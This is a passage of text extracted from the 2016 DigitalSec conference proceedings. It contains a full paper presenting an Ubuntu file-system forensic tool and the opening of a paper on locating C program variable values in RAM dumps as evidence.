Proceedings of The Third International Conference On Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Download as pdf or txt
Download as pdf or txt
You are on page 1of 123

Conference Title

The Third International Conference on Digital Security and


Forensics (DigitalSec2016)

Conference Dates

September 6-8, 2016

Conference Venue

Asia Pacific University of Technology and Innovation (APU),


Malaysia

ISBN

978-1-941968-37-6 2016 SDIWC

Published by

The Society of Digital Information and Wireless


Communications (SDIWC)
Wilmington, New Castle, DE 19801, USA
www.sdiwc.net

Table of Contents

An Evidence Collection and Analysis of Ubuntu File System .... 1


Utilizing Program's Execution Data for Digital Forensics .. 12
Systems in Danger: A Short Review on Metamorphic Computer Viruses . 20
Application and Evaluation of Method for Establishing Consensus on Measures
Based on Cybersecurity Framework 27
Development and Evaluation of a Dynamic Security Evaluation System for the
Cloud System Operation . 35
Proposal of an Improved Event Tree and Defense Tree Combined Method for Risk
Evaluation with Common Events .. 46
Proposal of Unified Data Management and Recovery Tool Using Shadow Copy 54
Countermeasure against Drive by Download Attack by Analyzing Domain Information .. 61
Fingerprinting Violating Machines with TCP Timestamps 68
Method for Detecting a Malicious Domain by Using WHOIS and DNS Features . 74
Awareness of Cloud Storage Forensics amongst the Malaysian Users .. 81
Filtering Avoidance Using Web Translation Service and its Countermeasures . 89
Using Mutual Information for Feature Selection In Network Intrusion Detection System .. 97
Cloud Authentication Logic on Data Security ... 105
Privacy and Security Challenges in Cloud Based Electronic Health Record:
Towards Access Control Model .. 113

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

An Evidence Collection and Analysis of Ubuntu File System


Dinesh N. Patil1, Bandu B. Meshram2
Veermata Jijabai Technological Institute
Matunga, Mumbai, India
[email protected], [email protected]

ABSTRACT
A file system of Ubuntu operating system can
conserve and manage a lot of configuration
information and the information with forensic
importance. Mining and analyzing the useful data of
the Ubuntu operating system have become essential
with the rise of the attack on the computer system.
Investigating the File System can help to collect
information relevant to the case. After considering
existing research and tools, this paper suggests a
new evidence collection and analysis methodology
and the UbuntuForensic tool to aid in the process of
digital forensic investigation of Ubuntu File System.
The paper also discusses a technique for the
identification of the files modified by the criminal.

KEYWORDS
File System, Digital Forensic, Integrated Analysis,
Timeline Analysis, Digital Evidence

1 INTRODUCTION
The Ubuntu operating system is one of the
distributions of the Linux operating system.
Most of the Ubuntu kernels are the default
Linux kernel. Ubuntu uses the Linux file
system which is usually considered as a tree
structure. Ubuntu is having Ext4 as its default
file system. Ext4 is an evolution of Ext3, which
was the default file system earlier. Linux
computers are very much prone to attack from
the hackers. Linux boxes are often used as
servers, essentially for a central control point.
In fact, roughly 70% of malware downloaded
by hackers to the honeypots is infected
with Linux/Rst-B [1]. Linux-based web servers
are constantly under attack. At SophosLabs, an

ISBN: 978-1-941968-37-6 2016 SDIWC

average of 16,000-24,000 websites were


compromised in a day in 2013 [2]. Linux
systems are indeed attacked by malware.
The Microsoft's operating system design
includes some features that make documents
able to install executable payloads. The use of a
database of software hooks and code stubs (the
registry) also simplified things [3]. Linux
malware is quite distinct from what it does and
how it does it, compared to Windows viruses,
but it exists. The crucial operating system
directories might be used by the malware to
affect the computer system as a whole. In
addition, there is always the risk of the
malicious insider. Attacks directed at Linux
systems tend to aim at exploiting bugs in
system services such as web browsers or Java
containers. These don't frequently run with
elevated privileges either, so an exploit is
typically contained to altering the behavior of
the targeted service and, possibly, disabling it.
The malware uses the various directories in the
Linux file system to plant it to run as a service
and harm the Computer. Also, the activity of
the malicious insider also gets stored in the file
system. This raises the need to do the forensic
investigation of directories under the Linux file
system to find the traces of malicious activities
on the system.
The paper is organized as follows: Section 2
discusses the related work and the existing tools
on the Linux file system forensics. Section 3
covers the forensic investigation of the various
user activities on the Linux file system. The
proposed UbuntuForensic tool is discussed in
section 4. Comparative study between the
existing Linux tools and the proposed tool is

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

performed in section 5. The findings are


concluded in section 6.
2 RELATED RESEARCH
This section details out the existing research on
the Linux file system forensic and the tool
developed to carry out the forensic
investigation of it.
2.1 Existing Research
The logging system is the most important
mechanism for Computer forensics on an
Operating System. The various logging
mechanism in Linux system that can be of
forensic importance is discussed in [4]. A
comparative study of the various file systems in
Ubuntu Linux and Free BSD is performed in
[5]. In order to meet the Linux file system
analysis applications demand for computer
forensics, an object-oriented method of
analyzing Linux file system is proposed in [6].
The paper also analyzed different data sources
deeply with the inheritance relationship
between classes and the encapsulation of class,
and showed information of Linux file to the
users in a friendly interface. The Linux
operating system has been used as a server
system in plenty of business services
worldwide. Unauthorized intrusions on a server
are constantly increasing with a geometric
progression. Conversely, the protection and
prevention techniques against intrusion
accidents are certainly insufficient. A new
framework to deal with a compromised Linux
system in a digital forensic investigation is
developed and implemented in [7]. Issues
pertaining to the Linux Forensics and the
various forensic tools for the forensic
investigation of the Linux system have been
discussed in [8].
2.2 Existing Tools
The Sleuth kit(TSK)

ISBN: 978-1-941968-37-6 2016 SDIWC

It is a collection of Unix-based command line


analysis tools. TSK can analyze FAT, NTFS,
Ext2/3, and UFS file systems and can list files
and directories, recover deleted files, make
timelines of file activity, perform keyword
searches, and use hash databases.
Autopsy
This tool is a graphical interface to the TSK. It
also analyzes FAT, NTFS, Ext2/3, and UFS file
systems and can list files and directories,
recover deleted files, make timelines of file
activity, perform keyword searches, and use
hash databases.
Scalpel
Scalpel is an open source file carver which is
also available for Linux. File carvers are used to
recover data from disks and to retrieve files
from raw disk images. In some case, file
carvers are even able to retrieve data if the
metadata of the file system were destroyed.
Scalpel is designed to use minimal resources
and to perform file carving.
Digital Evidence and Forensic Toolkit
(DEFT) Linux
DEFT is a free computer forensics Linux
distribution. DEFT is combined with the Digital
Advanced Response Toolkit (DART) which
contains a collection of forensics software for
Windows.
Computer Aided Investigative Environment
(CAINE)
CAINE is a Linux live distribution which aims
to provide a collection of forensics tools with a
GUI. It includes open source tools that support
the investigator in four phases of the forensic
process viz., Information gathering, collection,
examination, analysis. It also supports the
investigator by providing capabilities to
automate the creation of the final report and is
completely controlled by a GUI that is
organized according to the forensics phases.
i-Nex
It is an application that gathers information for
hardware components available on the system
and displays using user interface [9].

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

History
he history command lists commands that were
recently executed. This can help to track the
activity of an intruder.
3 EVIDENCE COLLECTION
PROPOSED TOOL

USING

The forensic investigator should be able to


analyze the activities of the user when
performing the investigation and in doing so the

timing of the activities is needed to be


considered to establish the correlation between
the time and the activity. As the details of the
users activities are recorded in the various files
managed by the file system of the Linux based
Computer System. The investigator should be
able to investigate the files stored in the seized
hard disk of the computer system which was
used to commit the crime.

Figure 1. A snapshot of UbuntuForensic tool showing Integrated Analysis

However, the previous forensic tools provided


limited facilities for performing the forensic
analysis of Linux file system. For this reason, a
new evidence collection and analysis
methodology is required. This methodology
performs integrated file system analysis,
timeline analysis and extracts the information
that is useful for the digital forensic analysis of
the file system.
3.1 Integrated Analysis
The cyber crime cell generally used to seize the
hard disk of the computer which is used for
crime purpose. The forensic investigator has the
responsibility to find out the possible traces of
evidence against the criminal. The Linux-based
computer system maintains the files in the

ISBN: 978-1-941968-37-6 2016 SDIWC

directory structure which begin with root


directory /.
The proposed UbuntuForensic tool provides the
facility for extracting the forensic evidence
from the files stored in the external hard disk.
This hard disk is needed to be connected to the
computer system having an UbuntuForensic
tool which mounts the external directory
structure in the media directory of the running
system to extract the evidence. The proposed
tool also performs Local file system forensic
which involves extracting the information from
the files about the various activity performed by
the user on the system, on which the tool is
running.
3.2 Analysis of User Activity

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

The existing tools provide a limited


functionality in extracting the forensic
information from the file system. This has
stimulated the need of having a file system
forensic tool which can extract the forensic data
from the directory structure based on the
various activities being performed by the user
and generate a report of the evidence for further
use.
The proposed UbuntuForensic tool covers the
various activities as discussed in [10], which

are performed on the Computer system. These


activities include:
Autorun programs running on the system
Recently accessed documents/programs,
Applications installed on the system
Network connected
Devices connected to the system
Last login activity of the user
Malware activity
The detail of these activities is as follows:

Figure 2. A snapshot of UbuntuForensic tool showing category of User Activities

The Autorun programs running on the


system
Many programs are configured in such a way
that when the Computer boot and start the
operating system, they automatically start
running such programs are called as Auto Run
program. In the case of Ubuntu, the information
about the programs which are to be executed
when the system booted is available in the file
stored /etc/rc.d directory. The malicious user
might gain an access to the Ubuntu system &
will add files in rc.d. So whenever the Ubuntu
System will boot up the malicious script will
automatically run. The forensic examiner will
have to look into those files to identify if any
file contains malicious code which may be
causing unauthorized activity on the system.

ISBN: 978-1-941968-37-6 2016 SDIWC

Recently Accessed documents and programs


From the documents that the user has recently
accessed, the forensic examiner can know about
the documents in which the user has interest. In
Ubuntu, the files which have been recently
accessed are noted in the file recentlyused.xbel. This file is available in the
local/share/ directory. The cat command can
be used to read the contents of the recentlyused.xbel file. Recently-used.xbel file provides
the detailed information about the files which
have been accessed by the user, the application
used to access those documents and the timing
of accessing & modifying these documents.
The recently accessed document information
helps in understanding the files which may have
been read, modified by the user.

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Applications installed on the system


In Ubuntu, the configuration information about
the application is stored in the /usr/bin directory
and the library required for these applications is
available in the /usr/lib directory. The list of the
application installed can be obtained by the
command ls l /usr/bin/. Using the information
available in the bin directory, analyst can
provide the historic view of the application
configuration that the user has installed onto the
system, date on which a particular application
was modified, permissions granted to the user,
size of the application etc.

Network connected or accessed


Ubuntu maintains the list of networks
connected
to
the
system
in
/etc/NetworkManager/system-connections. In
addition to this, it is possible to know the active
network connections which are being used in
the system using the command sudo netstat
tupn.
Syslog file in /var/log provides the date and
time at which a particular network connection
was established. Network information enables
the forensic examiner to know about the type of
network used in order to do malicious activity.

Figure 3. Forensic report using UbuntuForensic tool

Devices connected to the System


In Ubuntu lshw command provides the list of
hardware devices attached to the system. Also,
the /dev directory in the file system provides
the information about the hardware attached to
the system. The syslog file also maintains the
details of the devices which have been detected.
The date and timing at which the device was
connected along with device details are also
recorded in the syslog.
Last Login Activity of the user
In Ubuntu, the login time and the logout time
can be accessed by using the last command at
the terminal. Syslog file in the /var/log
maintains the login and shutdown time.
Malware Activity

ISBN: 978-1-941968-37-6 2016 SDIWC

To remain running after reboots, malware is


usually re-launched using some persistence
mechanism available in the various startup
methods on an Ubuntu system, including
services, drivers, scheduled tasks, and other
startup
locations.
There
are
several
configurations files that Ubuntu uses to
automatically launch an executable when a user
logs into the system that may contain traces of
malware programs. Malware often embeds
itself as a new, unauthorized service. A certain
amount of malware use /etc/init.d directory to
hide and start their execution on startup of the
system.
3.3 Timeline Analysis

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

The digital forensic investigator should detect


the activity being performed by the suspect
along a timeline. By performing the timeline
analysis, the investigator can trace the sequence
of events that were performed by the suspect.
For instance, if the suspect had accessed a word
document by logging using a login id, the date
and time of these activities can be correlated to
convict the suspect. The forensic report
obtained as in Figure 3 shows root user had
logged in at 11:39AM on 18/05/2016 and
accessed the .doc file 'An Evidence Collection
and Analysis of Ubuntu File System using
UbForensicTool' at 11:49AM using document
viewer application. This forensic information
can be evidence against the root user for
accessing the .doc file as the .doc file was
accessed after the login time by root user and
before the shutdown of the system. The forensic
report thus obtained using the UbuntuForensic
tool underlines the importance of performing
the timeline analysis of the activities.
3.4 Data Security
The approach for creating the backup of the
data and identifying the modified data on the
hard disk is proposed as follows.
The UbuntuForensic tool provides the facility
for the backup of the files from the hard disk of
the running system. The backup of these files is

ISBN: 978-1-941968-37-6 2016 SDIWC

maintained on the external storage media. The


content of these files then can be hashed one by
one and the resulting hashes are then indexed
and stored along with the file name and the path
of the file on the hard disk in a table on the
external storage. The md5 algorithm can be
used to obtain the hashes from the backup data.
In order to detect if any changes to the data on
the hard disk of the running system have been
caused by the suspicious criminal, the hashes
are obtained from the individual files on the
hard disk one by one and these hashes are then
compared with the hashes stored on the external
storage media. The comparison of two hashes is
performed only if the entry for a particular file
name on the hard disk is found in the table on
the external storage. Otherwise, the concerned
file is considered as deleted by the suspicious
user and a report can be prepared regarding this.
If two hashes which are being compared are
found dissimilar then it means that the criminal
has caused some modification to the relevant
file on the hard disk. A report can be prepared
about all the files whose hashes are found
dissimilar from that of the hashes in the
external storage. In such situation, the affected
file can be restored back from the external hard
disk.
The Figure 4 depicts the process for detecting
the modification of the data on the hard disk by
the criminal.

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Figure 4. Flowchart depicting operation for identification of modified files using UbuntuForensic tool

4 SOFTWARE ARCHITECTURE AND


IMPLEMENTATION
The
software
architecture
of
the
UbuntuForensic tool is illustrated in Figure 5.

The analysis of local and the external hard disk


directory structure can be performed using the
UbuntuForensic tool. The evidence and time of
the activity are extracted and the report is
generated for correlating the sequence of events
and their timings.

Figure 5. Software Architecture of UbuntuForensic tool

The software architecture consists of following


modules: Local File System Forensic, External
File System Forensic, Timestamp Generation,

ISBN: 978-1-941968-37-6 2016 SDIWC

Backup File System, Hash Generation and


Comparison, and Report Generation.

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

The Local and External File System Forensic


deals with extracting forensic evidence for
various user activities from the directory
structure of the system on which the tool is
running and the directory structure available on
the external hard disk. The time stamp
generation module generates the last modified
timestamp for the directory and the files
associated with the users activity concerned.
The forensic Report based on the forensic
evidence obtained and the generated timestamp
is obtained using Timestamp Generation
module.
The File System forensic algorithm for the
proposed tool is as follows:
Requires Activity (i, D(DIR)) returns the
extracted forensic information forensic_info for
each ith activity from the DIR directory of the
directory structure D. Select(forensic_info(i))
selects the evidence from the forensic_info.
Timestamp (i, D( DIR)) returns the timestamp
for the directory DIR for the ith activity.
Generate_Report generates the report from the
selected evidence and the timestamp. MAX
indicates the maximum number of users
activity.
Input The directory structure D
Output Report in text format
1. For i (1, MAX) do;
2. forensic_info(i) Activity(i,D(DIR))
3. forensic_evidence(i) select(forensic_in
fo(i))
4. timestampi Timestamp(i,D(DIR))
5. Report Generate_Report(forensic_evid
ence, timestamp)
The Activity(i,D(DIR)) function extracts the
forensic information from the directory
structure for the ith activity of the user. Once the
forensic information is extracted, the forensic
investigator can select the digital evidence from
it. The Timestamp(i, D(DIR)) function
generates the timestamp for the ith activity of the
user based on the last access and modification
timestamp of the directory. As the contents of
the directory are accessed or changed, the

ISBN: 978-1-941968-37-6 2016 SDIWC

timestamp of the directory also gets changed.


This procedure is repeated for all the users
activity in consideration. Once all the activities
are finished, the forensic investigator generates
the Forensic report.
The backup of the files managed by the file
system is performed using Backup File System
module. The data backed up is then hashed by
the hash generation module to generate the md5
hash. The hash so obtained then can be stored
on the external storage in a relational table.
Whenever the threat is detected, the hashes can
be obtained for the hard disk data and these
hashes then can be compared with the hashes in
the external storage to identify the modified
files by the criminal as discussed in section 3.4.
The structure definition of the table storing the
hashes on the external storage is proposed as
follows:
typedef struct _TABLE
{
Number int;
File_Name string[20];
Path_Name string[20];
Hash long int;
} table;
The field description is as follows:

Number: This field is an index for the


entry in the relation.

File_Name: The name of the backed up


file from the hard disk.

Path_Name: The path of the concerned


file on the hard disk.

Hash: The md5 hashes obtained on the


content of the file.
The UbuntuForensic tool is built using QT4, a
cross-platform application frame-work that is
widely used for developing application software
that can run on various software and hardware
platforms with little or no change in the
underlying code base while having the power
and speed of native applications. Qt uses
standard C++ with extensions including signals
and slots that simplify handling of events, and
this helps in the development of both GUI and
server applications which receive their own set

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

of event information and should process them


accordingly. The UbuntuForensic tool uses
QSetting class and its methods to extract the
informations from the directory structure of the
Ubuntu file system.
5 EVALUATION
The comparison between the existing widely
used Linux forensic tools and the
UbuntuForensic Tool is performed as in table 1.
The tool like TSK, autopsy can list file and
directories and perform timeline analysis of file
activity. DEFT and CAINE provides GUI based
forensic tools. i-Nex and History tools provide
information about the hardware connected to
the system and the recent command executed
on the system recently, respectively. However,
it has been observed that none of the Linux
tools provides the facility for extracting the
evidence for the specific activity of the user.
Comparatively, the UbuntuForensic tool
performs the extraction of forensic related
information about the various users activity
being performed on the system. The
UbuntuForensic tool also performs timeline
analysis using which the conviction of the
criminal can be performed based on the last
access, modification dates of the directories and
the login time of the suspicious user. The
UbuntuForensic tool supports local and external
file system forensics. In External file system
forensics, the external hard disk with Ubuntu
operating system is mounted on the system with
the UbuntuForensic tool to extract the forensic
evidence.
The proposed UbuntuForensic tool also
performs the backup of the files and directories

ISBN: 978-1-941968-37-6 2016 SDIWC

and also provides hashing of the file contents to


identify any changes to the file by the criminal.
Based on the advanced requirements mentioned
in the paper, UbuntuForensic tool improves
over the shortcoming of the existing tools.
The UbuntuForensic tool is tested on 5 hard
disks with Ubuntu and Linux compatible file
system. These disks are classified into two sets:
internal and external. The internal hard disk is
an indispensable part of the Computer System
on which the UbuntuForensic tool is running.
The external hard disk is needed to be
connected externally to the system to extract the
evidence from it. The disk1, disk2, disk4 are
internal hard disk and the disk3 and disk5 are
external hard disk. The disk1 partitions are
formatted with ext2 file system. Disk2 and
disk4 partitions are formatted with ext3 file
system. Disk3 and disk 5 partitions are
formatted with ext4 file system. The
effectiveness of the tool is obtained in terms of
Retrieval Rate metric for extracting the
evidence for the various users activities. It has
been observed that the effectiveness of the tool
is 100% for all the hard disks used in
the experimentation for Autorun, Recently
Accessed Documents, applications installed,
Last Login, Malware activities. However, in the
case of Network Connected and Devices
Connected activities, the Retrieval Rate is 98%
as the command such as netstat and lshw
displays the network and hardware devices
related information only about the running
system.

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Table 1. Functional comparison with existing tools


Tool

Function
Integrated
Analysis

Timeline
Analysis

Activity

GUI support

Any other feature

Analysis

UbuntuForensicTool

Running process,
Hash Generation

(Proposed)
The Sleuth kit(TSK)

Autopsy

Scalpel

DEFT

Data
Recovery
and
hashing,
Process
information

CAINE

Data Recovery

i-Nex

Display
device
information,
generate report

History

Hence these commands cant extract this


information from the external hard disk (disk3).
The effectiveness of the tool is summarized in
figure 6.

Figure 6. Effectiveness of UbuntuForensic tool

6 CONCLUSION

ISBN: 978-1-941968-37-6 2016 SDIWC

Recovers deleted
files
Recovers deleted
files

Recover
from disks

data

Lists
only
command history

The File System maintains historical


information about user activity in its directory
structure. All of this information can be
extremely valuable to a forensic analyst,
particularly when attempting to establish the
timeline of activity on a system. It is essential
to perform the analysis of the file system and
use timeline analysis to detect the suspicious
activities of the suspect. A wide range of cases
would benefit greatly from the information
derived or extracted from the file system.
A survey on the existing Linux forensic tools
revealed that they extract very little forensic
information
from
the
file
system.
Comparatively, the UbuntuForensic tool
provides more evidence from the file system as
that of the existing tools; saving the time and
effort in searching the evidence. The
UbuntuForensic tool also covers forensic
analysis of the file system on the external hard

10

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

disk, thus enabling the forensic investigator to


conduct the forensic investigation without
changing the setup. By computing the hashes
on the files from the hard disk, it is observed
that the files which are modified by the criminal
can be identified.
7 REFERENCES
1.

2.

3.

4.
5.

6.

7.

8.
9.
10.

SophosLab, Botnets, a free tool and 6 years of


Linux/Rst-B,
https://nakedsecurity.sophos.com/2008/02/13/bo
tnets-a-free-tool-and-6-years-of-linuxrst-b,
2008.
Sophos, Dont believe these four myths about
Linux
Security,
http://blogs.sophos.com/2015/03/26/dontbelieve-these-four-myths-about-linux-security,
2015.
J. McInnes, Linux Operating System dont get
attacked
by
viruses,why?,
https://www.quora.com/Linux-OperatingSystem-dont-get-attacked-by-Viruses-why,
2015.
L. Tang, The study of Computer forensics on
Linux,
International
conference
on
computational and Information Sciences , 2013.
Y. Kuo-pao and K. Wallace, File Systems in
Linux and Free BSD:A Comparative study,
Journal of Emerging Trends in Computing and
Information Sciences,vol.2, 2011.
C.Wei and L. Chun-mei, The Analysis and
Design of Linux File System Based on
Computer Forensic, International Conference
on Computer Design and Applications , 2010.
C. Joonah, C. Antonio, G. Paolo, L. Seokhee
and L. Sangjin, Live Forensic Analysis of a
Compromised Linux System using LECT(Linux
Evidence Collection Tool), International
Conference on Information Security and
Assurance, 2008.
B. Grundy, Advanced artifact analysis,
European Union Agency for Network and
Information Security, 2014.
ArchLinux,
https://wiki.archlinux.org/index.php/List_of_app
lication/Utilities, 2016.
D. Patil and B. Meshram, Forensic
investigation of user activities on Windows7 and
Ubuntu12 operating system, International
Journal of Innovations in Engineering and
Technology, vol. 5, 2015.

ISBN: 978-1-941968-37-6 2016 SDIWC

11

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Utilizing Programs Execution Data for Digital Forensics


Ziad A. Al-Sharif
Software Engineering Department
Jordan University of Science and Technology
Irbid, 22110, P.O. Box 3030, Jordan
[email protected]
ABSTRACT
Criminals use computers and software to perform
their crimes or to cover their misconducts. Main
memory or RAM encompasses vibrant information
about a system including its active processes.
Programs variables data and value vary in their
scope and duration in RAM. This paper exploits
programs execution state and its dataflow to
obtain evidence of the software usage.
It
extracts information left by program execution
in support for legal actions against perpetrators.
Our investigation model assumes no information is
provided by the operating system; only raw RAM
dumps. Our methodology employs information
from the target program source code.
This
paper targets C programs that are used on Unix
based systems. Several experiments are designed
to show that scope and storage information of
various source code variables can be used to
identify programs activities. Results show that
investigators have good chances locating various
variables values even after the process is stopped.

KEYWORDS
Digital Forensics, Memory Forensics, Memory
Dumps, Carving Variable Values, String Variables,
C Programs.

INTRODUCTION

Criminals use computers and software to


perform their crimes or to cover their
wrongdoings. Locating a program on the
machines hard disk might not be enough to
establish the definite usage of that program. An
evidence might be needed to confirm that the
perpetrator is actually used that program. This
evidence can be found in a couple of places,
one of which is the RAM of the used machine.

ISBN: 978-1-941968-37-6 2016 SDIWC

This emphasizes the significance of memory


forensics and its use in crime investigation.
Generally, programs vary on their dependency
on memory, CPU, disk I/Os, and networks [1].
A programs control flow might highly depend
on various variables and their values that are
stored in different main memory locations
(RAM). These variables can be categorized
based on their scopes and execution lifetimes.
A scope determines the visibility of a variable
and where it can be accessed within the
programs source code. In contrast, variables
storage (memory type) determines the duration
in which its value is created and destroyed
or deleted. Additionally, variables can be
classified based on whether they are allowed
to be changed during execution. Constant
variables are those that cannot be changed once
are assigned, most of which are often assigned
with literal values (hard coded values). These
literals might be unique to the executable
program and its execution state. Additionally,
many other non-constant variables might be
initialized with hard coded values (literals).
Assuming no information is available from
the operating system; only raw RAM dumps.
This paper locates evidences that would be
used to confirm the software usage and its
association with the crime. Our investigation
model is based on variables scopes and
memory types.
In order to verify our
research methodology, various experiments
and scenarios are developed. RAM memory
dumps are created and analyzed to locate
related variables value (literal and non-literal)
based on the program source code and its
execution state.
This paper targets C programs that run under
Unix based systems.
However, most of
our findings are equally applicable for other

12

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

languages and operating systems. Our results


show that regardless of whether the process is
active or just stopped, the memory investigator
can employ knowledge about the program
source code and its variables such as global
and local static and their potential values to
assure the program usage. Hence, values of
local auto variables are successfully located
when their corresponding stack frames are
still active. On the other hand, dynamically
allocated values can be located as long as the
program is not stopped and the corresponding
memory is not released.
The rest of this paper is organized as follows.
Section 2 highlights some of the background
knowledge used in this paper. Section 3
describes our investigation model and how it
employs information available in the program
source code to confirm that the program
is actually used. Section 4 presents our
four experiments and Section 5 discusses our
promising results. Section 6 presents some
of the related works. Finally, our planned
future work is presented in Section 7 whereas
Section 8 concludes our findings.
2

BACKGROUND

A software process may employ various


variables (memory storages). In C language,
variables can be classified based on their scope
and duration into global, local auto, and local
static [2]. Global and static data is allocated
by the runtime system for a program at its
start. These variables might be initialized with
default values whenever they are not explicitly
initialized by the programmer. The lifetime
(duration) of this kind of data is same as the
process that uses the data [3, 4]. However,
unlike global variables, the visibility of local
static variables is limited to the scope of its
function or block.
Typically, all operating systems provide
services to programs they run. In a Unix based
system, when the Kernel executes a C program,
a special routine (known as the startup routine)
is automatically invoked to set up the command
line arguments and the environments. Then,
the main() function is called.

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 1. A general view of the major logical segments


of the memory dedicated for a loaded process (running
program) under a Unix based system.

The Kernel manages software processes, each


of which is provided a dedicated memory space
in RAM [5, 6, 7]. When the executable starts,
various sections are allocated and loaded into
RAM, the starts and ends of these sections
are independent of the RAM page limits.
During execution, different variables are stored
in RAM into various logically classified
segments. Figure 1 shows a logical view of the
major memory segments that are dedicated to a
running process. A loaded process consists of
the following major segments:
.text: is a read-only segment that contains
the binary instructions (executable) located
below the heap and stack.
.rodata: is a read-only segment that contains
the immutable variables; read-only constants
and string literals.
.data: is a read-write segment that contains
global and local static mutable variables that
are explicitly initialized by programmers.
.bss: is a read-write segment that contains
global and local static mutable variables that

13

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

are uninitialized by the programmer. Usually,


variables in this segment are initialized by the
Kernel before the program starts.
Heap: is a memory segment allocated when
the process starts. It provides runtime memory
allocation for variables and their values as
needed during execution. Programs data
that lives in heap can be referenced outside
the function scope.
In C language, the
heap memory allocations are managed by the
program with help from the Kernel through
system calls such as malloc(), calloc() and
recalloc(). An explicit request can be initiated
to release these allocated memory using system
calls such as free() [3, 4].
Stack: is a memory segment allocated when
the program starts and it is automatically
managed by the Kernel and its runtime system.
It consists of blocks called activation records
or frames, each of which represents a call
to a function and provides storage for its
corresponding local and formal parameters.
The lifetime (duration) of variables allocated
on the stack is same as the scope in which they
are declared (mostly the function and its stack
frame) [3, 4].
Figure 2 shows a sample C program
with various variables scopes and their
correspondence to the logical view presented
in Figure 1. Hence, memory investigators can
utilize the memory of various variables values
to locate evidences about the actual use of the
software.
3

INVESTIGATION MODEL

A variable scope affects its visibility within the


program source code and a variable storage
affects its duration. Hence, different scopes
and storages might affect the survivability of
a variables value in memory during various
execution states. Accordingly, locating these
values in a RAM memory dump can be
used as evidence to prove that a user is
actually used the presumed program. Our

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 2. Sample C program shows different variables


and their corresponding logical memory segments and
duration.

investigation model studies the possibility of


locating these variables values that are used
within different scopes and storage types. Our
experimentations study three different scopes:
global, local auto, and local static. It also tries
to distinguish between various values within
different execution states, see Figure 3. These
execution states are based on various scenarios
such as:
The variable is used or not-used yet
during program execution
The variable was used in a currently active
or inactive stack frame
The variable is never used; the variable is
never reached or the stack frame is never
been active
The allocated variables data is never
released or just released
The software process is live (still running)
or dead (just stopped)
Furthermore, our investigation model assumes
no information is provided by the operating
system, only memory dumps that are created
during various execution states and scenarios.

14

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Then, each memory dump is searched for


potential values related to the source code of
the presumed program, see Figure 4.

Figure 4. Investigation Model: Step 1 represents the


process of crating a memory dump. Step 2 represents
the searching process for potential values related to the
target program source code.

assigned during program execution. Thus,


experiments 1, 2, and 3 are designed to
investigate variables assigned with string
literals during different execution states.
On the contrary, experiment 4 is designed
to investigate variables values that are
dynamically allocated and modified. Our
experiments explore three different variables
scopes: global, local auto, and local static.
Figure 3. Various variables states that are explored
during our experiments. #1 represents a literal value
within an active frame and a live process. #2 represents
a literal value within a currently inactive frame and a live
process. #3 represents a literal value within a currently
inactive frame and a dead process. #4 represents a
dynamically allocated value first within a live process
and then within a dead process.

Experimentation Setup: in all four


experiments, we used a Linux virtual machine
that is created using VirtualBox. The VM runs
openSUSE Linux version 13.1. with 512 MB
of RAM memory. This VM is hosted on a Mac
OS X 10.11.5. See Figure 5.
4.1 Experiment #1

EXPERIMENTS

Four experiments are designed, each of


which explores the potential evidence that
would prove the actual software usage during
various execution states, see Figure 3. A
variable can be assigned a literal or non-literal
value.
Non-literal values are those that
are dynamically calculated or modified and

ISBN: 978-1-941968-37-6 2016 SDIWC

First experiment is designed to explore the


use of a literal string in a currently active
stack frame and whether it affects the ability
to locate this string in a memory dump that
is created during a live process, see #1 in
Figure 3. It investigates three different variable
scopes: global, local auto, and local static,
each of which is initialized at declaration time

15

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

A memory dump is seized in each of these


states for each of the three explored variable
scopes. Then, these dumps are searched for
these literal values. Results of our findings are
discussed in Section 5.
4.3 Experiment #3
Figure 5. Experimentation Setup: the VM is created
using Oracles VirtualBox.

with a string literal. It explores two different


states within an active stack frame of an active
process:
State 1: The variable is used; reached in
one of the executed statements
State 2: The variable is not-used yet; not
reached in any of the thus far executed
statements
A memory dump is seized in each of these
states for each of the explored variables. Each
of these dumps is searched for the subject
variable and its literal string value. The results
of our findings are presented in Section 5.
4.2

Experiment #2

Second experiment is designed to explore the


use of a literal string in a currently inactive
stack frame and whether it affects the ability
to locate this string in a memory dump, see #2
in Figure 3. Similar to the first experiment,
this one targets live processes with three
different variable scopes: global, local auto,
and local static, each of which is initialized
at declaration time with a string literal. It
explores three different variables states within
an inactive stack frame of an active process:
State 1: The variable was used; read or
assigned in one of the executed statements
State 2: The variable was not used; not
read or assigned in any of the thus far
executed statements
State 3: The stack frame was never active;
the function is never called

ISBN: 978-1-941968-37-6 2016 SDIWC

Third experiment is very similar to the second


experiment. Except, it explores the effects of
having an inactive process (just stopped) on
the same three scopes and the same three states
investigated during the second experiment, see
#3 in Figure 3. A memory dump is seized in
each one of these states for each of the three
